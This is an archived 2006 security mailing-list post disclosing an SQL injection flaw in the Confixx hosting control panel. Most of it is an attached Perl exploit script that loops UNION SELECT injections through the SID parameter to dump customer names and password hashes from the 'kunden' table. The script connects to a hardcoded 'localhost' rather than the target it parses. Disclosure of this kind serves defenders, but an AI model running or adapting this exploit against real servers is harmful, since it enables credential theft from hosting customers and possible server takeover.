[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <03F9B5FF-D085-400F-ADD0-06975E9705A8@systemli.org>
Date: Tue Apr 18 23:01:11 2006
From: defa at systemli.org (defa)
Subject: Confixx Index.PHP SQL Injection Vulnerability
(Exploit - not new vuln)
Here is more information on the confixx vuln released by LoK Crew.
Sorry for the poor quality of this posting, I was short of time.
Product:
^^^^^^^
Confixx is a comprehensive control panel that provides the best
value, proven quality, fully developed feature set and quality
support. The software?s powerful features have been especially
designed to meet the requirements of hosting providers.
More -> http://www.swsoft.com/en/products/confixx/
Risk: High - eventually remote root access
^^^^
Serverity: High
^^^^^^^^
Discussion:
^^^^^^^^^^^
The vuln itself can be found in the html/session.inc.php in the
function sessao_read( $sKey ) which is used to overwrite the php-own
session methods.
The file "loginform.php" can be used to display e.g. admin hashes.
Read the rest by studying the attached exploit.
Reference:
^^^^^^^^^^
Vuln was published by LoK-Crew here:
http://venom.sam-city.com/confixx2.txt
Read more:
^^^^^^^^^^^
http://www.securityfocus.com/bid/17476/
Code:
^^^^^
--------------- <snip> -------------
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=========================
confixx_exploit.pl [URL]
params:
[URL] - server url
);
exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
for ($i=0;$i<=100;$i++)
{
#$i=1;
$hit = 0;
$url = "http://";
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B8,':%22','HIT:%
20',";
$url .= "kunde,'%20:%20',longpw,'%22;')%20AS%20'sdata'%20FROM%20kunden
%20LIMIT%20";
$url .= "$i,1/*";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"localhost", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $url HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /<p>HIT:/)
{
# $answer =~ s/<[A-Z,a-z,=].+>//g;
print "$answer";
$hit = 1;
}
}
if ($hit == 0) {die("that's it");}
}
--------------- <snap> -------------
bye
defa
--
don't eat yellow snow
Powered by blists - more mailing lists